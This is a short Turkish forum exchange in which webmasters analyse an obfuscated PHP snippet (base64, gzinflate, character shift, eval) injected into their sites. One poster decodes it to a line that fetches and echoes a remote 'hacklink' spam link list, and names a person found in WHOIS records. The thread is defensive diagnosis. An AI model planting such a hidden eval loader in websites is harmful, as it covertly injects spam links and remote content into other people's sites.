Aynı dertten bende muzdaribim.
<?php function yVlA($bVn)
{
$bVn=gzinflate(base64_decode($bVn));
for($i=0;$i<strlen($bVn);$i++)
{
$bVn[$i] = chr(ord($bVn[$i])-1);
}
return $bVn;
}eval(yVlA("U1QEAj7utJTMAkXH9KzctISMtNKElIL80rT80h JN5czS0kJrA4OqpJyk3KTUrLySrOos/ZSCPIPcrPycEjCpX1pZqqxlw8ftYA8A"));?>
Eklenilen kod bu. 5 adet ***** sitesinin linki olduğunu farkettim, wmaracı sayesinde..
Bu kodu nasıl çözebilirim fikri olan var mı?
Kodun çözülmüş hali şu şekilde; linke girildiğinde hacklink listesi çıkıyor zaten.
echo @file_get_contents("http://yakaladimsizi.com/links/link.txt");
?>Whois bilgilerinde Adem Bozkurt diye biri çıkıyor, ufak bir araştırma yapınca da, aynı domain ile yaptığı hacklink girişimlerine dair R10 şikayet konusu çıkıyor.
https://www.r10.net/wordpress-seo-guv...gi-dikkat.html
Yıllardır bu işi yapan birisi demek ki.
